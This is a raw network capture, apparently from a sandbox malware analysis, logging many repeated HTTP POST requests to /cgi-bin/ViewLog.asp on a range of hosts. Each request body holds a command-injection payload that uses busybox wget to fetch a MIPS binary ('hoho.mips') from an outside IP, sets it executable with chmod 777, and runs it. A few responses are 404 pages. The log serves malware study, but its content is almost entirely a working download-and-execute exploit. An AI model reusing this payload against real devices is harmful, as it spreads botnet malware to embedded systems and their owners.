                                              353192.168.2.133498294.120.63.68080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:53.675709963 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              354192.168.2.133506694.120.211.2108080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:53.675860882 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              355192.168.2.135582885.108.180.2388080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:53.688119888 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:53.925810099 CET465INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 07:16:52 GMT
                                              Server: Webs
                                              X-Frame-Options: SAMEORIGIN
                                              Cache-Control: no-cache
                                              Content-Length: 166
                                              Content-Type: text/html
                                              Connection: keep-alive
                                              Keep-Alive: timeout=60, max=99
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              356192.168.2.135825094.140.0.1728080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:53.776462078 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              357192.168.2.133887685.143.175.1318080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:53.888650894 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:54.103985071 CET681INHTTP/1.1 404
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 431
                                              Date: Thu, 23 Nov 2023 04:16:53 GMT
                                              Keep-Alive: timeout=60
                                              Connection: keep-alive
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              358192.168.2.133846031.136.139.1438080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:56.308511972 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:56.902466059 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:58.054419994 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:00.454375982 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:05.062514067 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:14.278373003 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:33.222284079 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:10.086236954 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              359192.168.2.135559685.122.224.708080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:56.352737904 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              360192.168.2.135560094.121.145.338080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:56.352799892 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              361192.168.2.134276631.136.212.1828080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:56.491364956 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:57.062429905 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:58.182375908 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:00.454376936 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:05.062526941 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:14.022341013 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:33.222318888 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:10.086205959 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


